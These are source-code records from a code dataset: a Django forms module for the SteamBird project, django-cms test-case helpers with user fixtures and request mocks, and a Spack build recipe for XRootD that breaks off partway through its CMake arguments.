f72ed55ad5ef38ef972e01b4b0f6447434a2d27e | 1,831 | py | Python | steambird/teacher/forms.py | rhbvkleef/SteamBird | 6dbbad0750ef918872da18b813669282885b8f95 | [
"BSD-3-Clause"
] | null | null | null | steambird/teacher/forms.py | rhbvkleef/SteamBird | 6dbbad0750ef918872da18b813669282885b8f95 | [
"BSD-3-Clause"
] | 22 | 2020-11-27T19:05:34.000Z | 2020-12-05T16:50:43.000Z | steambird/teacher/forms.py | rhbvkleef/SteamBird | 6dbbad0750ef918872da18b813669282885b8f95 | [
"BSD-3-Clause"
] | 1 | 2020-11-27T21:08:15.000Z | 2020-11-27T21:08:15.000Z | """
This module contains all forms used in the teacher Views
"""
from django import forms
from django.forms import HiddenInput, MultipleHiddenInput
from django.urls import reverse_lazy
from django_addanother.widgets import AddAnotherWidgetWrapper
from django_select2.forms import ModelSelect2MultipleWidget
from steambird.models.materials import StudyMaterialEdition
from steambird.models.msp import MSPLine
class PrefilledMSPLineForm(forms.ModelForm):
class Meta:
model = MSPLine
fields = [
"type",
"msp",
"comment",
"materials",
]
widgets = {
"msp": HiddenInput(),
"comment": HiddenInput(),
"materials": MultipleHiddenInput(),
"type": HiddenInput(),
}
class PrefilledSuggestAnotherMSPLineForm(forms.ModelForm):
class Meta:
model = MSPLine
fields = [
"type",
"msp",
"materials",
"comment",
]
widgets = {
"msp": HiddenInput(),
"type": HiddenInput(),
"materials": AddAnotherWidgetWrapper(ModelSelect2MultipleWidget(
queryset=StudyMaterialEdition.objects.all(),
search_fields=[
"name__icontains",
"book__ISBN__icontains",
"book__author__icontains",
"book__year_of_publishing__icontains",
"scientificarticle__DOI__icontains",
"scientificarticle__author__icontains",
"scientificarticle__year_of_publishing__icontains",
]
), reverse_lazy('material_management:material.create')),
# TODO: Convert this to a teacher:book.create view when it exists.
}
| 30.516667 | 78 | 0.588749 |
from django import forms
from django.forms import HiddenInput, MultipleHiddenInput
from django.urls import reverse_lazy
from django_addanother.widgets import AddAnotherWidgetWrapper
from django_select2.forms import ModelSelect2MultipleWidget
from steambird.models.materials import StudyMaterialEdition
from steambird.models.msp import MSPLine
class PrefilledMSPLineForm(forms.ModelForm):
class Meta:
model = MSPLine
fields = [
"type",
"msp",
"comment",
"materials",
]
widgets = {
"msp": HiddenInput(),
"comment": HiddenInput(),
"materials": MultipleHiddenInput(),
"type": HiddenInput(),
}
class PrefilledSuggestAnotherMSPLineForm(forms.ModelForm):
class Meta:
model = MSPLine
fields = [
"type",
"msp",
"materials",
"comment",
]
widgets = {
"msp": HiddenInput(),
"type": HiddenInput(),
"materials": AddAnotherWidgetWrapper(ModelSelect2MultipleWidget(
queryset=StudyMaterialEdition.objects.all(),
search_fields=[
"name__icontains",
"book__ISBN__icontains",
"book__author__icontains",
"book__year_of_publishing__icontains",
"scientificarticle__DOI__icontains",
"scientificarticle__author__icontains",
"scientificarticle__year_of_publishing__icontains",
]
), reverse_lazy('material_management:material.create')),
}
| true | true |
f72ed5c8bcb24075d3aff50b80d0f1369dcafefb | 12,123 | py | Python | cms/test_utils/testcases.py | jinktv/django-cms | d8c689957f0d098a106829e896e0c91d0c1abd86 | [
"BSD-3-Clause"
] | null | null | null | cms/test_utils/testcases.py | jinktv/django-cms | d8c689957f0d098a106829e896e0c91d0c1abd86 | [
"BSD-3-Clause"
] | 1 | 2021-03-19T15:46:42.000Z | 2021-03-19T15:46:42.000Z | cms/test_utils/testcases.py | jinktv/django-cms | d8c689957f0d098a106829e896e0c91d0c1abd86 | [
"BSD-3-Clause"
] | 1 | 2016-11-07T01:42:14.000Z | 2016-11-07T01:42:14.000Z | # -*- coding: utf-8 -*-
from cms.models import Page
from cms.test_utils.util.context_managers import (UserLoginContext,
SettingsOverride)
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
from django.template.context import Context
from django.test import testcases
from django.test.client import RequestFactory
from django.utils.translation import activate
from menus.menu_pool import menu_pool
from urlparse import urljoin
import sys
import urllib
import warnings
from cms.utils.permissions import set_current_user
from cms.compat import User
URL_CMS_PAGE = "/en/admin/cms/page/"
URL_CMS_PAGE_ADD = urljoin(URL_CMS_PAGE, "add/")
URL_CMS_PAGE_CHANGE = urljoin(URL_CMS_PAGE, "%d/")
URL_CMS_PAGE_CHANGE_LANGUAGE = URL_CMS_PAGE_CHANGE + "?language=%s"
URL_CMS_PAGE_DELETE = urljoin(URL_CMS_PAGE_CHANGE, "delete/")
URL_CMS_PLUGIN_ADD = urljoin(URL_CMS_PAGE_CHANGE, "add-plugin/")
URL_CMS_PLUGIN_EDIT = urljoin(URL_CMS_PAGE_CHANGE, "edit-plugin/")
URL_CMS_PLUGIN_MOVE = urljoin(URL_CMS_PAGE_CHANGE, "move-plugin/")
URL_CMS_PLUGIN_REMOVE = urljoin(URL_CMS_PAGE_CHANGE, "remove-plugin/")
URL_CMS_TRANSLATION_DELETE = urljoin(URL_CMS_PAGE_CHANGE, "delete-translation/")
URL_CMS_PAGE_HISTORY = urljoin(URL_CMS_PAGE_CHANGE, "history/%d/")
URL_CMS_PLUGIN_HISTORY_EDIT = urljoin(URL_CMS_PAGE_HISTORY, "edit-plugin/")
class _Warning(object):
def __init__(self, message, category, filename, lineno):
self.message = message
self.category = category
self.filename = filename
self.lineno = lineno
def _collectWarnings(observeWarning, f, *args, **kwargs):
def showWarning(message, category, filename, lineno, file=None, line=None):
assert isinstance(message, Warning)
observeWarning(_Warning(
message.args[0], category, filename, lineno))
# Disable the per-module cache for every module otherwise if the warning
# which the caller is expecting us to collect was already emitted it won't
# be re-emitted by the call to f which happens below.
for v in sys.modules.itervalues():
if v is not None:
try:
v.__warningregistry__ = None
except:
# Don't specify a particular exception type to handle in case
# some wacky object raises some wacky exception in response to
# the setattr attempt.
pass
origFilters = warnings.filters[:]
origShow = warnings.showwarning
warnings.simplefilter('always')
try:
warnings.showwarning = showWarning
result = f(*args, **kwargs)
finally:
warnings.filters[:] = origFilters
warnings.showwarning = origShow
return result
class CMSTestCase(testcases.TestCase):
counter = 1
def _fixture_setup(self):
super(CMSTestCase, self)._fixture_setup()
self.create_fixtures()
activate("en")
def create_fixtures(self):
pass
def _post_teardown(self):
# Needed to clean the menu keys cache, see menu.menu_pool.clear()
menu_pool.clear()
super(CMSTestCase, self)._post_teardown()
set_current_user(None)
def login_user_context(self, user):
return UserLoginContext(self, user)
def get_superuser(self):
try:
admin = User.objects.get(username="admin")
except User.DoesNotExist:
admin = User(username="admin", is_staff=True, is_active=True, is_superuser=True)
admin.set_password("admin")
admin.save()
return admin
def get_staff_user_with_no_permissions(self):
"""
Used in security tests
"""
staff = User(username="staff", is_staff=True, is_active=True)
staff.set_password("staff")
staff.save()
return staff
def get_new_page_data(self, parent_id=''):
page_data = {
'title': 'test page %d' % self.counter,
'slug': 'test-page-%d' % self.counter,
'language': settings.LANGUAGES[0][0],
'template': 'nav_playground.html',
'parent': parent_id,
'site': 1,
}
# required only if user haves can_change_permission
page_data['pagepermission_set-TOTAL_FORMS'] = 0
page_data['pagepermission_set-INITIAL_FORMS'] = 0
page_data['pagepermission_set-MAX_NUM_FORMS'] = 0
page_data['pagepermission_set-2-TOTAL_FORMS'] = 0
page_data['pagepermission_set-2-INITIAL_FORMS'] = 0
page_data['pagepermission_set-2-MAX_NUM_FORMS'] = 0
self.counter = self.counter + 1
return page_data
def get_new_page_data_dbfields(self, parent=None, site=None,
language=None,
template='nav_playground.html',):
page_data = {
'title': 'test page %d' % self.counter,
'slug': 'test-page-%d' % self.counter,
'language': settings.LANGUAGES[0][0] if not language else language,
'template': template,
'parent': parent if parent else None,
'site': site if site else Site.objects.get_current(),
}
self.counter = self.counter + 1
return page_data
def get_pagedata_from_dbfields(self, page_data):
"""Converts data created by get_new_page_data_dbfields to data
created from get_new_page_data so you can switch between test cases
in api.create_page and client.post"""
page_data['site'] = page_data['site'].id
page_data['parent'] = page_data['parent'].id if page_data['parent'] else ''
# required only if user haves can_change_permission
page_data['pagepermission_set-TOTAL_FORMS'] = 0
page_data['pagepermission_set-INITIAL_FORMS'] = 0
page_data['pagepermission_set-MAX_NUM_FORMS'] = 0
page_data['pagepermission_set-2-TOTAL_FORMS'] = 0
page_data['pagepermission_set-2-INITIAL_FORMS'] = 0
page_data['pagepermission_set-2-MAX_NUM_FORMS'] = 0
return page_data
def print_page_structure(self, qs):
"""Just a helper to see the page struct.
"""
for page in qs.order_by('tree_id', 'lft'):
ident = " " * page.level
print "%s%s (%s), lft: %s, rght: %s, tree_id: %s" % (ident, page,
page.pk, page.lft, page.rght, page.tree_id)
def print_node_structure(self, nodes, *extra):
def _rec(nodes, level=0):
ident = level * ' '
for node in nodes:
raw_attrs = [(bit, getattr(node, bit, node.attr.get(bit, "unknown"))) for bit in extra]
attrs = ', '.join(['%s: %r' % data for data in raw_attrs])
print "%s%s: %s" % (ident, node.title, attrs)
_rec(node.children, level + 1)
_rec(nodes)
def assertObjectExist(self, qs, **filter):
try:
return qs.get(**filter)
except ObjectDoesNotExist:
pass
raise self.failureException, "ObjectDoesNotExist raised for filter %s" % filter
def assertObjectDoesNotExist(self, qs, **filter):
try:
qs.get(**filter)
except ObjectDoesNotExist:
return
raise self.failureException, "ObjectDoesNotExist not raised for filter %s" % filter
def copy_page(self, page, target_page):
from cms.utils.page import get_available_slug
data = {
'position': 'last-child',
'target': target_page.pk,
'site': 1,
'copy_permissions': 'on',
'copy_moderation': 'on',
}
response = self.client.post(URL_CMS_PAGE + "%d/copy-page/" % page.pk, data)
self.assertEquals(response.status_code, 200)
# Altered to reflect the new django-js jsonified response messages
self.assertEquals(response.content, '{"status": 200, "content": "ok"}')
title = page.title_set.all()[0]
copied_slug = get_available_slug(title)
copied_page = self.assertObjectExist(Page.objects, title_set__slug=copied_slug, parent=target_page)
return copied_page
def move_page(self, page, target_page, position="first-child"):
page.move_page(target_page, position)
return self.reload_page(page)
def reload_page(self, page):
"""
Returns a fresh instance of the page from the database
"""
return self.reload(page)
def reload(self, obj):
return obj.__class__.objects.get(pk=obj.pk)
def get_pages_root(self):
return urllib.unquote(reverse("pages-root"))
def get_context(self, path=None):
if not path:
path = self.get_pages_root()
context = {}
request = self.get_request(path)
context['request'] = request
return Context(context)
def get_request(self, path=None, language=None, post_data=None, enforce_csrf_checks=False):
factory = RequestFactory()
if not path:
path = self.get_pages_root()
if not language:
language = settings.LANGUAGES[0][0]
if post_data:
request = factory.post(path, post_data)
else:
request = factory.get(path)
request.session = self.client.session
request.user = getattr(self, 'user', AnonymousUser())
request.LANGUAGE_CODE = language
request._dont_enforce_csrf_checks = not enforce_csrf_checks
class MockStorage(object):
def __len__(self):
return 0
def __iter__(self):
return iter([])
def add(self, level, message, extra_tags=''):
pass
def update(self, response):
pass
request._messages = MockStorage()
return request
def check_published_page_attributes(self, page):
public_page = page.publisher_public
if page.parent:
self.assertEqual(page.parent_id, public_page.parent.publisher_draft.id)
self.assertEqual(page.level, public_page.level)
# TODO: add check for siblings
draft_siblings = list(page.get_siblings(True).filter(
publisher_is_draft=True
).order_by('tree_id', 'parent', 'lft'))
public_siblings = list(public_page.get_siblings(True).filter(
publisher_is_draft=False
).order_by('tree_id', 'parent', 'lft'))
skip = 0
for i, sibling in enumerate(draft_siblings):
if not sibling.publisher_public_id:
skip += 1
continue
self.assertEqual(sibling.id,
public_siblings[i - skip].publisher_draft.id)
def failUnlessWarns(self, category, message, f, *args, **kwargs):
warningsShown = []
result = _collectWarnings(warningsShown.append, f, *args, **kwargs)
if not warningsShown:
self.fail("No warnings emitted")
first = warningsShown[0]
for other in warningsShown[1:]:
if ((other.message, other.category)
!= (first.message, first.category)):
self.fail("Can't handle different warnings")
self.assertEqual(first.message, message)
self.assertTrue(first.category is category)
return result
assertWarns = failUnlessWarns
class SettingsOverrideTestCase(CMSTestCase):
settings_overrides = {}
def _pre_setup(self):
self._enter_settings_override()
super(SettingsOverrideTestCase, self)._pre_setup()
def _enter_settings_override(self):
self._settings_ctx_manager = SettingsOverride(**self.settings_overrides)
self._settings_ctx_manager.__enter__()
def _post_teardown(self):
super(SettingsOverrideTestCase, self)._post_teardown()
self._exit_settings_override()
def _exit_settings_override(self):
self._settings_ctx_manager.__exit__(None, None, None)
| 35.866864 | 107 | 0.635156 |
from cms.models import Page
from cms.test_utils.util.context_managers import (UserLoginContext,
SettingsOverride)
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
from django.template.context import Context
from django.test import testcases
from django.test.client import RequestFactory
from django.utils.translation import activate
from menus.menu_pool import menu_pool
from urlparse import urljoin
import sys
import urllib
import warnings
from cms.utils.permissions import set_current_user
from cms.compat import User
URL_CMS_PAGE = "/en/admin/cms/page/"
URL_CMS_PAGE_ADD = urljoin(URL_CMS_PAGE, "add/")
URL_CMS_PAGE_CHANGE = urljoin(URL_CMS_PAGE, "%d/")
URL_CMS_PAGE_CHANGE_LANGUAGE = URL_CMS_PAGE_CHANGE + "?language=%s"
URL_CMS_PAGE_DELETE = urljoin(URL_CMS_PAGE_CHANGE, "delete/")
URL_CMS_PLUGIN_ADD = urljoin(URL_CMS_PAGE_CHANGE, "add-plugin/")
URL_CMS_PLUGIN_EDIT = urljoin(URL_CMS_PAGE_CHANGE, "edit-plugin/")
URL_CMS_PLUGIN_MOVE = urljoin(URL_CMS_PAGE_CHANGE, "move-plugin/")
URL_CMS_PLUGIN_REMOVE = urljoin(URL_CMS_PAGE_CHANGE, "remove-plugin/")
URL_CMS_TRANSLATION_DELETE = urljoin(URL_CMS_PAGE_CHANGE, "delete-translation/")
URL_CMS_PAGE_HISTORY = urljoin(URL_CMS_PAGE_CHANGE, "history/%d/")
URL_CMS_PLUGIN_HISTORY_EDIT = urljoin(URL_CMS_PAGE_HISTORY, "edit-plugin/")
class _Warning(object):
def __init__(self, message, category, filename, lineno):
self.message = message
self.category = category
self.filename = filename
self.lineno = lineno
def _collectWarnings(observeWarning, f, *args, **kwargs):
def showWarning(message, category, filename, lineno, file=None, line=None):
assert isinstance(message, Warning)
observeWarning(_Warning(
message.args[0], category, filename, lineno))
# be re-emitted by the call to f which happens below.
for v in sys.modules.itervalues():
if v is not None:
try:
v.__warningregistry__ = None
except:
# Don't specify a particular exception type to handle in case
pass
origFilters = warnings.filters[:]
origShow = warnings.showwarning
warnings.simplefilter('always')
try:
warnings.showwarning = showWarning
result = f(*args, **kwargs)
finally:
warnings.filters[:] = origFilters
warnings.showwarning = origShow
return result
class CMSTestCase(testcases.TestCase):
counter = 1
def _fixture_setup(self):
super(CMSTestCase, self)._fixture_setup()
self.create_fixtures()
activate("en")
def create_fixtures(self):
pass
def _post_teardown(self):
menu_pool.clear()
super(CMSTestCase, self)._post_teardown()
set_current_user(None)
def login_user_context(self, user):
return UserLoginContext(self, user)
def get_superuser(self):
try:
admin = User.objects.get(username="admin")
except User.DoesNotExist:
admin = User(username="admin", is_staff=True, is_active=True, is_superuser=True)
admin.set_password("admin")
admin.save()
return admin
def get_staff_user_with_no_permissions(self):
"""
Used in security tests
"""
staff = User(username="staff", is_staff=True, is_active=True)
staff.set_password("staff")
staff.save()
return staff
def get_new_page_data(self, parent_id=''):
page_data = {
'title': 'test page %d' % self.counter,
'slug': 'test-page-%d' % self.counter,
'language': settings.LANGUAGES[0][0],
'template': 'nav_playground.html',
'parent': parent_id,
'site': 1,
}
page_data['pagepermission_set-TOTAL_FORMS'] = 0
page_data['pagepermission_set-INITIAL_FORMS'] = 0
page_data['pagepermission_set-MAX_NUM_FORMS'] = 0
page_data['pagepermission_set-2-TOTAL_FORMS'] = 0
page_data['pagepermission_set-2-INITIAL_FORMS'] = 0
page_data['pagepermission_set-2-MAX_NUM_FORMS'] = 0
self.counter = self.counter + 1
return page_data
def get_new_page_data_dbfields(self, parent=None, site=None,
language=None,
template='nav_playground.html',):
page_data = {
'title': 'test page %d' % self.counter,
'slug': 'test-page-%d' % self.counter,
'language': settings.LANGUAGES[0][0] if not language else language,
'template': template,
'parent': parent if parent else None,
'site': site if site else Site.objects.get_current(),
}
self.counter = self.counter + 1
return page_data
def get_pagedata_from_dbfields(self, page_data):
"""Converts data created by get_new_page_data_dbfields to data
created from get_new_page_data so you can switch between test cases
in api.create_page and client.post"""
page_data['site'] = page_data['site'].id
page_data['parent'] = page_data['parent'].id if page_data['parent'] else ''
page_data['pagepermission_set-TOTAL_FORMS'] = 0
page_data['pagepermission_set-INITIAL_FORMS'] = 0
page_data['pagepermission_set-MAX_NUM_FORMS'] = 0
page_data['pagepermission_set-2-TOTAL_FORMS'] = 0
page_data['pagepermission_set-2-INITIAL_FORMS'] = 0
page_data['pagepermission_set-2-MAX_NUM_FORMS'] = 0
return page_data
def print_page_structure(self, qs):
"""Just a helper to see the page struct.
"""
for page in qs.order_by('tree_id', 'lft'):
ident = " " * page.level
print "%s%s (%s), lft: %s, rght: %s, tree_id: %s" % (ident, page,
page.pk, page.lft, page.rght, page.tree_id)
def print_node_structure(self, nodes, *extra):
def _rec(nodes, level=0):
ident = level * ' '
for node in nodes:
raw_attrs = [(bit, getattr(node, bit, node.attr.get(bit, "unknown"))) for bit in extra]
attrs = ', '.join(['%s: %r' % data for data in raw_attrs])
print "%s%s: %s" % (ident, node.title, attrs)
_rec(node.children, level + 1)
_rec(nodes)
def assertObjectExist(self, qs, **filter):
try:
return qs.get(**filter)
except ObjectDoesNotExist:
pass
raise self.failureException, "ObjectDoesNotExist raised for filter %s" % filter
def assertObjectDoesNotExist(self, qs, **filter):
try:
qs.get(**filter)
except ObjectDoesNotExist:
return
raise self.failureException, "ObjectDoesNotExist not raised for filter %s" % filter
def copy_page(self, page, target_page):
from cms.utils.page import get_available_slug
data = {
'position': 'last-child',
'target': target_page.pk,
'site': 1,
'copy_permissions': 'on',
'copy_moderation': 'on',
}
response = self.client.post(URL_CMS_PAGE + "%d/copy-page/" % page.pk, data)
self.assertEquals(response.status_code, 200)
self.assertEquals(response.content, '{"status": 200, "content": "ok"}')
title = page.title_set.all()[0]
copied_slug = get_available_slug(title)
copied_page = self.assertObjectExist(Page.objects, title_set__slug=copied_slug, parent=target_page)
return copied_page
def move_page(self, page, target_page, position="first-child"):
page.move_page(target_page, position)
return self.reload_page(page)
def reload_page(self, page):
"""
Returns a fresh instance of the page from the database
"""
return self.reload(page)
def reload(self, obj):
return obj.__class__.objects.get(pk=obj.pk)
def get_pages_root(self):
return urllib.unquote(reverse("pages-root"))
def get_context(self, path=None):
if not path:
path = self.get_pages_root()
context = {}
request = self.get_request(path)
context['request'] = request
return Context(context)
def get_request(self, path=None, language=None, post_data=None, enforce_csrf_checks=False):
factory = RequestFactory()
if not path:
path = self.get_pages_root()
if not language:
language = settings.LANGUAGES[0][0]
if post_data:
request = factory.post(path, post_data)
else:
request = factory.get(path)
request.session = self.client.session
request.user = getattr(self, 'user', AnonymousUser())
request.LANGUAGE_CODE = language
request._dont_enforce_csrf_checks = not enforce_csrf_checks
class MockStorage(object):
def __len__(self):
return 0
def __iter__(self):
return iter([])
def add(self, level, message, extra_tags=''):
pass
def update(self, response):
pass
request._messages = MockStorage()
return request
def check_published_page_attributes(self, page):
public_page = page.publisher_public
if page.parent:
self.assertEqual(page.parent_id, public_page.parent.publisher_draft.id)
self.assertEqual(page.level, public_page.level)
draft_siblings = list(page.get_siblings(True).filter(
publisher_is_draft=True
).order_by('tree_id', 'parent', 'lft'))
public_siblings = list(public_page.get_siblings(True).filter(
publisher_is_draft=False
).order_by('tree_id', 'parent', 'lft'))
skip = 0
for i, sibling in enumerate(draft_siblings):
if not sibling.publisher_public_id:
skip += 1
continue
self.assertEqual(sibling.id,
public_siblings[i - skip].publisher_draft.id)
def failUnlessWarns(self, category, message, f, *args, **kwargs):
warningsShown = []
result = _collectWarnings(warningsShown.append, f, *args, **kwargs)
if not warningsShown:
self.fail("No warnings emitted")
first = warningsShown[0]
for other in warningsShown[1:]:
if ((other.message, other.category)
!= (first.message, first.category)):
self.fail("Can't handle different warnings")
self.assertEqual(first.message, message)
self.assertTrue(first.category is category)
return result
assertWarns = failUnlessWarns
class SettingsOverrideTestCase(CMSTestCase):
settings_overrides = {}
def _pre_setup(self):
self._enter_settings_override()
super(SettingsOverrideTestCase, self)._pre_setup()
def _enter_settings_override(self):
self._settings_ctx_manager = SettingsOverride(**self.settings_overrides)
self._settings_ctx_manager.__enter__()
def _post_teardown(self):
super(SettingsOverrideTestCase, self)._post_teardown()
self._exit_settings_override()
def _exit_settings_override(self):
self._settings_ctx_manager.__exit__(None, None, None)
| false | true |
f72ed60ac026397d696947159bb11c0de6f0aad9 | 5,247 | py | Python | var/spack/repos/builtin/packages/xrootd/package.py | MiddelkoopT/spack | 4d94c4c4600f42a7a3bb3d06ec879140bc259304 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/xrootd/package.py | MiddelkoopT/spack | 4d94c4c4600f42a7a3bb3d06ec879140bc259304 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/xrootd/package.py | MiddelkoopT/spack | 4d94c4c4600f42a7a3bb3d06ec879140bc259304 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Xrootd(CMakePackage):
"""The XROOTD project aims at giving high performance, scalable fault
tolerant access to data repositories of many kinds."""
homepage = "http://xrootd.org"
url = "http://xrootd.org/download/v5.0.1/xrootd-5.0.1.tar.gz"
version('5.0.1', sha256='ff4462b0b61db4cc01dda0e26abdd78e43649ee7ac5e90f7a05b74328ff5ac83')
version('4.12.3', sha256='6f2ca1accc8d49d605706bb556777c753860bf46d845b1ee11393a5cb5987f15', preferred=True)
version('4.12.2', sha256='29f7bc3ea51b9d5d310eabd177152245d4160223325933c67f938ed5120f67bb')
version('4.12.1', sha256='7350d9196a26d17719b839fd242849e3995692fda25f242e67ac6ec907218d13')
version('4.12.0', sha256='69ef4732256d9a88127de4bfdf96bbf73348e0c70ce1d756264871a0ffadd2fc')
version('4.11.3', sha256='8e7a64fd55dfb452b6d5f76a9a97c493593943227b377623a3032da9197c7f65')
version('4.11.2', sha256='4620824db97fcc37dc3dd26110da8e5c3aab1d8302e4921d4f32e83207060603')
version('4.10.0', sha256='f07f85e27d72e9e8ff124173c7b53619aed8fcd36f9d6234c33f8f7fd511995b')
version('4.8.5', sha256='42e4d2cc6f8b442135f09bcc12c7be38b1a0c623a005cb5e69ff3d27997bdf73')
version('4.8.4', sha256='f148d55b16525567c0f893edf9bb2975f7c09f87f0599463e19e1b456a9d95ba')
version('4.8.3', sha256='9cd30a343758b8f50aea4916fa7bd37de3c37c5b670fe059ae77a8b2bbabf299')
version('4.8.2', sha256='8f28ec53e799d4aa55bd0cc4ab278d9762e0e57ac40a4b02af7fc53dcd1bef39')
version('4.8.1', sha256='edee2673d941daf7a6e5c963d339d4a69b4db5c4b6f77b4548b3129b42198029')
version('4.8.0', sha256='0b59ada295341902ca01e9d23e29780fb8df99a6d2bd1c2d654e9bb70c877ad8')
version('4.7.1', sha256='90ddc7042f05667045b06e02c8d9c2064c55d9a26c02c50886254b8df85fc577')
version('4.7.0', sha256='6cc69d9a3694e8dcf2392e9c3b518bd2497a89b3a9f25ffaec62efa52170349b')
version('4.6.1', sha256='0261ce760e8788f85d68918d7702ae30ec677a8f331dae14adc979b4cc7badf5')
version('4.6.0', sha256='b50f7c64ed2a4aead987de3fdf6fce7ee082407ba9297b6851cd917db72edd1d')
version('4.5.0', sha256='27a8e4ef1e6bb6bfe076fef50afe474870edd198699d43359ef01de2f446c670')
version('4.4.1', sha256='3c295dbf750de086c04befc0d3c7045fd3976611c2e75987c1477baca37eb549')
version('4.4.0', sha256='f066e7488390c0bc50938d23f6582fb154466204209ca92681f0aa06340e77c8')
version('4.3.0', sha256='d34865772d975b5d58ad80bb05312bf49aaf124d5431e54dc8618c05a0870e3c')
variant('http', default=True,
description='Build with HTTP support')
variant('python', default=False,
description='Build pyxroot Python extension')
variant('readline', default=True,
description='Use readline')
variant('cxxstd',
default='11',
values=('98', '11', '14', '17'),
multi=False,
description='Use the specified C++ standard when building.')
conflicts('cxxstd=98', when='@4.7.0:')
depends_on('bzip2')
depends_on('cmake@2.6:', type='build')
depends_on('libxml2', when='+http')
depends_on('uuid', when="@4.11.0:")
depends_on('openssl')
depends_on('python', when='+python')
depends_on('readline', when='+readline')
depends_on('xz')
depends_on('zlib')
extends('python', when='+python')
patch('python-support.patch', level=1, when='@:4.8.99+python')
def patch(self):
"""Remove hardcoded -std=c++0x flag
"""
if self.spec.satisfies('@4.7.0:'):
filter_file(r'\-std=c\+\+0x', r'', 'cmake/XRootDOSDefs.cmake')
def cmake_args(self):
spec = self.spec
options = [
'-DENABLE_HTTP:BOOL={0}'.
format('ON' if '+http' in spec else 'OFF'),
'-DENABLE_PYTHON:BOOL={0}'.
format('ON' if '+python' in spec else 'OFF'),
'-DENABLE_READLINE:BOOL={0}'.
format('ON' if '+readline' in spec else 'OFF'),
'-DENABLE_CEPH:BOOL=OFF'
]
# see https://github.com/spack/spack/pull/11581
if '+python' in self.spec:
options.append('-DPYTHON_EXECUTABLE=%s' %
spec['python'].command.path)
return options
def setup_build_environment(self, env):
cxxstdflag = ''
if self.spec.variants['cxxstd'].value == '98':
cxxstdflag = self.compiler.cxx98_flag
elif self.spec.variants['cxxstd'].value == '11':
cxxstdflag = self.compiler.cxx11_flag
elif self.spec.variants['cxxstd'].value == '14':
cxxstdflag = self.compiler.cxx14_flag
elif self.spec.variants['cxxstd'].value == '17':
cxxstdflag = self.compiler.cxx17_flag
else:
# The user has selected a (new?) legal value that we've
# forgotten to deal with here.
tty.die(
"INTERNAL ERROR: cannot accommodate unexpected variant ",
"cxxstd={0}".format(self.spec.variants['cxxstd'].value))
if cxxstdflag:
env.append_flags('CXXFLAGS', cxxstdflag)
| 46.848214 | 112 | 0.684772 |
from spack import *
class Xrootd(CMakePackage):
homepage = "http://xrootd.org"
url = "http://xrootd.org/download/v5.0.1/xrootd-5.0.1.tar.gz"
version('5.0.1', sha256='ff4462b0b61db4cc01dda0e26abdd78e43649ee7ac5e90f7a05b74328ff5ac83')
version('4.12.3', sha256='6f2ca1accc8d49d605706bb556777c753860bf46d845b1ee11393a5cb5987f15', preferred=True)
version('4.12.2', sha256='29f7bc3ea51b9d5d310eabd177152245d4160223325933c67f938ed5120f67bb')
version('4.12.1', sha256='7350d9196a26d17719b839fd242849e3995692fda25f242e67ac6ec907218d13')
version('4.12.0', sha256='69ef4732256d9a88127de4bfdf96bbf73348e0c70ce1d756264871a0ffadd2fc')
version('4.11.3', sha256='8e7a64fd55dfb452b6d5f76a9a97c493593943227b377623a3032da9197c7f65')
version('4.11.2', sha256='4620824db97fcc37dc3dd26110da8e5c3aab1d8302e4921d4f32e83207060603')
version('4.10.0', sha256='f07f85e27d72e9e8ff124173c7b53619aed8fcd36f9d6234c33f8f7fd511995b')
version('4.8.5', sha256='42e4d2cc6f8b442135f09bcc12c7be38b1a0c623a005cb5e69ff3d27997bdf73')
version('4.8.4', sha256='f148d55b16525567c0f893edf9bb2975f7c09f87f0599463e19e1b456a9d95ba')
version('4.8.3', sha256='9cd30a343758b8f50aea4916fa7bd37de3c37c5b670fe059ae77a8b2bbabf299')
version('4.8.2', sha256='8f28ec53e799d4aa55bd0cc4ab278d9762e0e57ac40a4b02af7fc53dcd1bef39')
version('4.8.1', sha256='edee2673d941daf7a6e5c963d339d4a69b4db5c4b6f77b4548b3129b42198029')
version('4.8.0', sha256='0b59ada295341902ca01e9d23e29780fb8df99a6d2bd1c2d654e9bb70c877ad8')
version('4.7.1', sha256='90ddc7042f05667045b06e02c8d9c2064c55d9a26c02c50886254b8df85fc577')
version('4.7.0', sha256='6cc69d9a3694e8dcf2392e9c3b518bd2497a89b3a9f25ffaec62efa52170349b')
version('4.6.1', sha256='0261ce760e8788f85d68918d7702ae30ec677a8f331dae14adc979b4cc7badf5')
version('4.6.0', sha256='b50f7c64ed2a4aead987de3fdf6fce7ee082407ba9297b6851cd917db72edd1d')
version('4.5.0', sha256='27a8e4ef1e6bb6bfe076fef50afe474870edd198699d43359ef01de2f446c670')
version('4.4.1', sha256='3c295dbf750de086c04befc0d3c7045fd3976611c2e75987c1477baca37eb549')
version('4.4.0', sha256='f066e7488390c0bc50938d23f6582fb154466204209ca92681f0aa06340e77c8')
version('4.3.0', sha256='d34865772d975b5d58ad80bb05312bf49aaf124d5431e54dc8618c05a0870e3c')
variant('http', default=True,
description='Build with HTTP support')
variant('python', default=False,
description='Build pyxroot Python extension')
variant('readline', default=True,
description='Use readline')
variant('cxxstd',
default='11',
values=('98', '11', '14', '17'),
multi=False,
description='Use the specified C++ standard when building.')
conflicts('cxxstd=98', when='@4.7.0:')
depends_on('bzip2')
depends_on('cmake@2.6:', type='build')
depends_on('libxml2', when='+http')
depends_on('uuid', when="@4.11.0:")
depends_on('openssl')
depends_on('python', when='+python')
depends_on('readline', when='+readline')
depends_on('xz')
depends_on('zlib')
extends('python', when='+python')
patch('python-support.patch', level=1, when='@:4.8.99+python')
def patch(self):
if self.spec.satisfies('@4.7.0:'):
filter_file(r'\-std=c\+\+0x', r'', 'cmake/XRootDOSDefs.cmake')
def cmake_args(self):
spec = self.spec
options = [
'-DENABLE_HTTP:BOOL={0}'.
format('ON' if '+http' in spec else 'OFF'),
'-DENABLE_PYTHON:BOOL={0}'.
